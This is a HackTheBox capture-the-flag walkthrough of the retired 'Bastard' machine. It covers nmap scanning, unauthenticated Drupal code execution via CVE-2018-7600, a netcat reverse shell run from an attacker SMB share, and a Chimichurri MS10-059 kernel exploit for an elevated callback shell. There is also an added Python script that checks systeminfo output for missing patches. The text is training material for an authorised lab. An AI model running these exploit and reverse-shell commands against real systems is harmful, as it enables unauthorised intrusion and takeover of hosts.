HTB Walkthrough : Bastard

Today we are going to solve another HackTheBox retired machine called "Bastard". This lab was designed by . So let's jump into the machine.

Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • Manual Enumeration of CMS
  • Exploitation
    • Drupal Exploit
  • Privilege Escalation
    • Kernel Exploit

Walkthrough

IP address : 10.129.145.159

We start our journey by running an nmap scan of all ports with default scripts and version detection, which gives us information about the open ports and the services running on the target system.

Enumeration

nmap -sC -sV -p- 10.129.145.159

Nmap shows that port 80 is running an HTTP service (Microsoft IIS 7.5), and the http-generator header tells us that Drupal 7 is running on it. Two other ports are open as well, 135 and 49154, both Microsoft Windows RPC.

Nmap scan report for 10.129.145.159
Host is up (0.17s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to Bastard | Bastard
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

From the results we choose to go with port 80, the Drupal CMS, and start enumerating it. After some googling we learn that Drupal ships a CHANGELOG.txt in its web root (robots.txt above even lists it under Disallow), and visiting that page reveals the exact installed version.

Here we get the actual version information: Drupal 7.54. From past experience this version is directly exploitable (CVE-2018-7600, "Drupalgeddon 2", affects Drupal 7 releases before 7.58).

After searching the internet we found a working exploit on GitHub. Metasploit also has a module for this, but since we want to learn manual exploitation we skip Metasploit.

Exploitation

This particular version of Drupal has an unauthenticated remote code execution vulnerability. Running the exploit with whoami returns the account the web server runs as, which confirms the exploit is working. Now all we have to figure out is how to get a reverse shell.

git clone https://github.com/pimps/CVE-2018-7600
cd CVE-2018-7600
python drupa7-CVE-2018-7600.py http://10.129.145.159 -c whoami

For the reverse shell we use the Windows netcat binary: we serve it from a temporary SMB share created with Impacket's smbserver.py, and then use the remote code execution vulnerability to run it straight from the UNC path so that it connects back to our Kali machine. A pre-compiled netcat binary is already available on Kali Linux under /usr/share/windows-binaries.

cp /usr/share/windows-binaries/nc.exe ./
sudo smbserver.py share .

Once everything is set up, start the listener first and then fire the exploit to get the initial foothold on the target machine (10.10.14.79 is our attacking machine). The triple backslash is needed because bash collapses \\ into a single backslash inside double quotes, so the target receives the UNC path \\10.10.14.79\share\nc.exe.

rlwrap nc -lnvp 1234
python drupa7-CVE-2018-7600.py http://10.129.145.159 -c "\\\10.10.14.79\share\nc.exe -e cmd.exe 10.10.14.79 1234"

We get a reverse shell over netcat on port 1234.

Privilege Escalation

Since we have the initial foothold on the target, it's time to elevate our privileges to the administrator account. We check the system information with the Windows command "systeminfo": the machine is Windows Server 2008 R2 at build 7600 (the RTM release, no Service Pack 1), and the Hotfix(s) field reads N/A, meaning no patches are installed at all. That makes it a strong candidate for a kernel exploit. To find candidates we can use tools like Windows Exploit Suggester or wesng, among others; save the systeminfo output to a file on the attacking machine, since those tools take it as input.

systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46
System Boot Time:          15/5/2021, 11:15:16
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.573 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.599 MB
Virtual Memory: In Use:    496 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.129.0.1
                                 IP address(es)
                                 [01]: 10.129.145.159
                                 [02]: fe80::6ccc:55b:423f:1148
                                 [03]: dead:beef::6ccc:55b:423f:1148

To run Windows Exploit Suggester we have to set up a Python 2 virtual environment and install its xlrd dependency (pinned to 1.2.0, the release the tool works with). We create the virtual environment with virtualenv, download the bulletin database with --update, and then feed it the saved systeminfo output.

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
pip install virtualenv 
virtualenv -p python2 venv
source venv/bin/activate
pip install xlrd==1.2.0
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2021-05-15-mssb.xls --systeminfo ../systeminfo.txt 

[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*] 
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*] 
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
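The suggester's verdict boils down to one comparison: which fix KBs are absent from the Hotfix(s) list. The following is an added example of that check, the editor's own code rather than the post's or the suggester's. It parses systeminfo text, handles both the "Hotfix(s): N/A" form seen on this box and the indented KB list a patched host prints, and compares against a small bulletin table constructed from the suggester output above (the KB numbers are the ones in parentheses after each bulletin title); the two systeminfo samples are constructed, the Bastard one trimmed from the output on this page and the patched one invented for contrast.

```python
"""Added example: the check behind Windows Exploit Suggester's verdict.

Editor's own code, not the post's and not the suggester's.  It parses
systeminfo text, handles the 'Hotfix(s): N/A' case seen on this box as well
as the indented KB list a patched host prints, and reports which of a small
constructed bulletin table is missing its fix."""
import re

# Constructed sample, trimmed from the systeminfo output on this page.
SYSTEMINFO_BASTARD = """\
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
"""

# Constructed contrast case: a host with SP1 and three of the fixes applied.
SYSTEMINFO_PATCHED = """\
Host Name:                 PATCHED
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB982799
                           [02]: KB2393802
                           [03]: KB2778930
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
"""

# Local elevation-of-privilege bulletins from the suggester output above; the
# number in parentheses after each title is the KB that delivers the fix.
LOCAL_EOP_BULLETINS = {
    "MS13-005": "KB2778930",
    "MS11-011": "KB2393802",
    "MS10-073": "KB981957",
    "MS10-059": "KB982799",   # the one Chimichurri targets
    "MS10-047": "KB981852",
}

KEY_VALUE_RE = re.compile(r"^([A-Za-z][^:]*?):\s*(.*?)\s*$")   # unindented "Key: value"
KB_ENTRY_RE = re.compile(r"^\s+\[\d+\]:\s*(KB\d+)\s*$")        # indented "[01]: KB..."


def parse_systeminfo(text):
    """Return a dict of the top-level fields plus derived keys:
    hotfixes (list of KB ids), build (int) and service_pack (int)."""
    info = {"hotfixes": []}
    for line in text.splitlines():
        kv = KEY_VALUE_RE.match(line)
        if kv:
            info[kv.group(1)] = kv.group(2)
            continue
        kb = KB_ENTRY_RE.match(line)
        if kb:
            info["hotfixes"].append(kb.group(1))
    version = info.get("OS Version", "")
    build = re.search(r"\d+\.\d+\.(\d+)", version)
    sp = re.search(r"Service Pack (\d+)", version)
    info["build"] = int(build.group(1)) if build else None
    info["service_pack"] = int(sp.group(1)) if sp else 0
    return info


def is_unpatched_2008r2_rtm(info):
    """The situation on Bastard: 2008 R2 at RTM build 7600, no service pack, no hotfixes."""
    return ("2008 R2" in info.get("OS Name", "")
            and info["build"] == 7600
            and info["service_pack"] == 0
            and not info["hotfixes"])


def missing_patches(info, bulletins=LOCAL_EOP_BULLETINS):
    """Bulletins whose fix KB does not appear in the installed-hotfix list.
    KB presence/absence is the heuristic the suggester uses, and it ignores
    supersedence, so treat the result as a candidate list, not a verdict."""
    installed = set(info["hotfixes"])
    return sorted(b for b, kb in bulletins.items() if kb not in installed)


if __name__ == "__main__":
    for sample in (SYSTEMINFO_BASTARD, SYSTEMINFO_PATCHED):
        host = parse_systeminfo(sample)
        print(host["Host Name"], "RTM+unpatched:", is_unpatched_2008r2_rtm(host),
              "candidates:", missing_patches(host))
```

The caveat this makes visible: a host with zero hotfixes "misses" every fix, which is why the suggester reports 197 remaining vulns above, and a host that has a later cumulative update may still be flagged for a KB it superseded. The candidate list narrows the search; the actual exploit run is the confirmation.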

After some time trying different kernel exploits, we settle on "Chimichurri", a compiled exploit for MS10-059 (the Tracing Feature for Services elevation of privilege, listed with an [E] in the suggester output above). You can download it from GitHub. We transfer this binary to the victim machine using the temporary SMB server.

cp ~/Downloads/Chimichurri.exe ./
sudo smbserver.py share .

While trying to write files on the target we find that we don't have write permission in the web directory, so we move to a location that is writable by every user, such as C:\Windows\Temp or C:\Windows\Tasks.

cd "C:\windows\tasks"
copy \\10.10.14.79\share\Chimichurri.exe

After successfully transferring the binary it's time to get the elevated reverse shell. Chimichurri takes our IP and a port and connects back with an elevated cmd.exe, so start the listener first.

rlwrap nc -lvnp 4444
Chimichurri.exe 10.10.14.79 4444

Finally we get the elevated shell and it's time to collect the gems, the flags.

type "C:\Users\Administrator\Desktop\root.txt.txt"
type "C:\Users\dimitris\Desktop\user.txt"
